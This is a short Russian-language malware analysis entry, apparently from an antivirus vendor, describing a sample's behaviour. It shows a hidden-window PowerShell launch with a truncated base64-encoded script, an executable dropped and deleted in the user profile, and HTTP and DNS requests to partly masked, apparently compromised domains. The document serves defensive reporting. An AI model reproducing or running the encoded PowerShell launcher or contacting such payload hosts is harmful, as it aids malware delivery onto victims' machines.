Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABGAGYAegByADQANwBmAD0AKAAnAEgAJwArACgAJwAzAGQAeQByACcAKwAnAGkAcgAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBzAEUAUgBwAFIAbwBGAGkAbABFAFwAUgA0AGUANABTA...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\r4e4spq\b6q4hq_\gq_enxi3g.exe
Удаляет следующие файлы
- %HOMEPATH%\r4e4spq\b6q4hq_\gq_enxi3g.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://yd##in.fun/wp-includes/J2gtP7rvBA/
- http://ga##x.eu/001_elemei/mg9/
- http://on###six.com/test/fPF2zBUI/
- http://vi#.##zhiguoren.com/mzxf3/7l6w6t/
- http://www.gr####studio.com/docs/5fTKVT/
UDP
- DNS ASK yd##in.fun
- DNS ASK ga##x.eu
- DNS ASK on###six.com
- DNS ASK vi#.##zhiguoren.com
- DNS ASK ye###itruong.vn
- DNS ASK gr####studio.com
- DNS ASK is####hnology.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABGAGYAegByADQANwBmAD0AKAAnAEgAJwArACgAJwAzAGQAeQByACcAKwAnAGkAcgAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBzAEUAUgBwAFIAbwBGAGkAbABFAFwAUgA0AGUANABTA...' (со скрытым окном)
